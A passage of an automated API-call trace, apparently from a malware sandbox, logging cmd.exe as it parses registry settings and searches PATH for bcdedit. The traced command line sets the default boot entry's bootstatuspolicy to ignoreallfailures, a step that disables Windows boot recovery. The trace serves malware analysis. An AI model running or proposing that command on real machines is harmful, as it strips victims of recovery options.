lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegCloseKey (hKey=0x68) returned 0x0 [0077.126] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33ea1c | out: phkResult=0x33ea1c*=0x68) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x40, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x1, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x0, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x9, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.126] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x4, lpData=0x33ea28*=0x9, lpcbData=0x33ea20*=0x4) returned 0x0 [0077.127] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33ea24, lpData=0x33ea28, lpcbData=0x33ea20*=0x1000 | out: lpType=0x33ea24*=0x0, lpData=0x33ea28*=0x9, lpcbData=0x33ea20*=0x1000) returned 0x2 [0077.127] RegCloseKey (hKey=0x68) returned 0x0 [0077.127] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0077.127] srand (_Seed=0x5e9c43c9) [0077.127] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0077.127] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0077.127] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.127] GetProcessHeap () returned 0x680000 [0077.127] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x6920a0 [0077.127] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6920a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0077.127] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.127] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.127] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0077.127] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0077.127] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0077.127] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0077.128] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0077.128] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0077.128] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0077.128] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0077.128] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0077.128] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0077.128] GetProcessHeap () returned 0x680000 [0077.128] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x692b78 | out: hHeap=0x680000) returned 1 [0077.128] GetEnvironmentStringsW () returned 0x6922b8* [0077.128] GetProcessHeap () returned 0x680000 [0077.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xae2) returned 0x694c18 [0077.128] FreeEnvironmentStringsW (penv=0x6922b8) returned 1 [0077.128] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0077.128] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0077.128] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0077.128] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0077.128] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0077.128] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0077.128] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0077.128] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0077.128] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0077.128] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0077.128] GetProcessHeap () returned 0x680000 [0077.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x695708 [0077.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x33f7e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x33f7e8, lpFilePart=0x33f7e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f7e4*="Desktop") returned 0x25 [0077.129] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.129] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33f564 | out: lpFindFileData=0x33f564*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x691f20 [0077.129] FindClose (in: hFindFile=0x691f20 | out: hFindFile=0x691f20) returned 1 [0077.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x33f564 | out: lpFindFileData=0x33f564*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x691f20 [0077.129] FindClose (in: hFindFile=0x691f20 | out: hFindFile=0x691f20) returned 1 [0077.129] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0077.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x33f564 | out: lpFindFileData=0x33f564*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x691f20 [0077.129] FindClose (in: hFindFile=0x691f20 | out: hFindFile=0x691f20) returned 1 [0077.129] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.129] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0077.129] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0077.129] GetProcessHeap () returned 0x680000 [0077.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x694c18 | out: hHeap=0x680000) returned 1 [0077.130] GetEnvironmentStringsW () returned 0x694128* [0077.130] GetProcessHeap () returned 0x680000 [0077.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb36) returned 0x695f68 [0077.130] FreeEnvironmentStringsW (penv=0x694128) returned 1 [0077.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695708 | out: hHeap=0x680000) returned 1 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400e) returned 0x696aa8 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x80) returned 0x692df8 [0077.130] GetProcessHeap () returned 0x680000 [0077.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696aa8 | out: hHeap=0x680000) returned 1 [0077.130] GetConsoleOutputCP () returned 0x1b5 [0077.131] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.131] GetUserDefaultLCID () returned 0x409 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33f928, cchData=128 | out: lpLCData="0") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33f928, cchData=128 | out: lpLCData="0") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33f928, cchData=128 | out: lpLCData="1") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0077.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0077.132] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0077.133] GetProcessHeap () returned 0x680000 [0077.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20c) returned 0x692e80 [0077.133] GetConsoleTitleW (in: lpConsoleTitle=0x692e80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.133] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0077.133] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0077.133] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0077.134] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0077.134] GetProcessHeap () returned 0x680000 [0077.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400a) returned 0x696aa8 [0077.134] GetProcessHeap () returned 0x680000 [0077.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696aa8 | out: hHeap=0x680000) returned 1 [0077.134] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0077.134] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0077.135] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0077.135] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0077.135] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0077.135] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0077.135] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0077.135] GetProcessHeap () returned 0x680000 [0077.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x58) returned 0x693098 [0077.135] GetProcessHeap () returned 0x680000 [0077.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x6930f8 [0077.136] GetProcessHeap () returned 0x680000 [0077.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6e) returned 0x693118 [0077.137] GetConsoleTitleW (in: lpConsoleTitle=0x33f620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.137] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.137] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.137] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.137] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.137] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.137] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.137] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.137] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.137] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.137] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.137] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.137] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.137] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.137] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.137] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.137] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.137] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.138] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.138] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.138] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.138] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.138] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.138] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.138] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.138] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.138] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.138] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.138] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.138] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.138] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.138] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.138] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.138] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.138] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.138] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.138] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.138] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.138] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.138] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.138] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.138] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.138] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.139] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.139] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.139] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.139] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.139] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.139] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.139] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.139] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.139] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.139] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.139] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.139] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0077.140] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0077.140] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0077.140] GetProcessHeap () returned 0x680000 [0077.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x693190 [0077.140] GetProcessHeap () returned 0x680000 [0077.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x7e) returned 0x6933a8 [0077.140] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0077.140] GetProcessHeap () returned 0x680000 [0077.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x418) returned 0x6807f0 [0077.140] SetErrorMode (uMode=0x0) returned 0x0 [0077.140] SetErrorMode (uMode=0x1) returned 0x0 [0077.140] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6807f8, lpFilePart=0x33f140 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f140*="Desktop") returned 0x25 [0077.140] SetErrorMode (uMode=0x0) returned 0x1 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6807f0, Size=0x64) returned 0x6807f0 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6807f0) returned 0x64 [0077.141] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.141] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x120) returned 0x693430 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x238) returned 0x680860 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x680860, Size=0x122) returned 0x680860 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x680860) returned 0x122 [0077.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe0) returned 0x693558 [0077.148] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x693558, Size=0x76) returned 0x693558 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x693558) returned 0x76 [0077.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.149] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.149] GetLastError () returned 0x2 [0077.149] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.149] GetLastError () returned 0x2 [0077.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.149] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.282] GetLastError () returned 0x2 [0077.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.283] GetLastError () returned 0x2 [0077.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.283] GetLastError () returned 0x2 [0077.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.283] GetLastError () returned 0x2 [0077.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.285] GetLastError () returned 0x2 [0077.285] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.286] GetLastError () returned 0x2 [0077.286] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.286] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.573] GetLastError () returned 0x2 [0077.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.575] GetLastError () returned 0x2 [0077.575] _get_osfhandle (_FileHandle=2) returned 0xb [0077.575] GetFileType (hFile=0xb) returned 0x2 [0077.575] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0077.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x33f310 | out: lpMode=0x33f310) returned 1 [0077.576] _get_osfhandle (_FileHandle=2) returned 0xb [0077.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x33f344 | out: 